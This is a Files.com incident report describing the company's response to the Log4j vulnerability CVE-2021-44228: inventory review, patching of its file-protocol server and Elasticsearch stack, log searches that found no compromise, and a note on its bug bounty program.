Files.com Response to the Log4j Vulnerability
Incident Report for Files.com
Resolved
The Apache Log4j utility is a widely used free and open source software package for Java used for logging. On December 9, 2021, a serious vulnerability was announced (CVE-2021-44228) revealing that certain versions of Apache Log4j could be remotely compromised, allowing an unauthenticated attacker to execute arbitrary code.

The security of our customers and their files is a top priority at Files.com.

Using the procedures in our Information Security Policy, we immediately reviewed our Software Inventory and list of Open Source Software to determine which components use Java. We then investigated to determine which such software may use Log4j, and prioritized our response based on impact.

The most notable component impacted was our “files-protocol-server” internal service, which provides FTP, SFTP, WebDAV, ZIP, and public hosting services for Files.com. We deployed full fixes to this service during the business day on Friday December 9.

Another impacted item was Elasticsearch, and its associated utilities such as Kibana and Logstash. We use Elasticsearch in many different capacities at Files.com, both for customer-facing searches as well as internal compliance use. Based on our initial research, the vulnerability did not seem to be exploitable against our Elasticsearch instances, but all Elasticsearch have all been updated across our infrastructure anyway.

Nexus, another Java utility used by Files.com for critical components was determined not to use Log4j.

We searched our logs for signatures of the offending log strings and did not find any. There is no evidence of compromise at this time, and we are continuing to actively monitor the issue. No further action is needed by customers to continue using Files.com.

One of the numerous layers of security Files.com has in place is a 24/7 Bug Bounty Program. Through this bounty program, Files.com invites and incentivizes members of the security research community to continuously test our systems. There have not been any reports in our Bug Bounty Program related to CVE-2021-44228.

If you have any further questions or concerns, please let us know how we can assist you. You can contact us by email, chat (in your web interface when logged in), or phone (1-800-286-8372 ext. 2).
Posted Dec 09, 2021 - 00:15 PST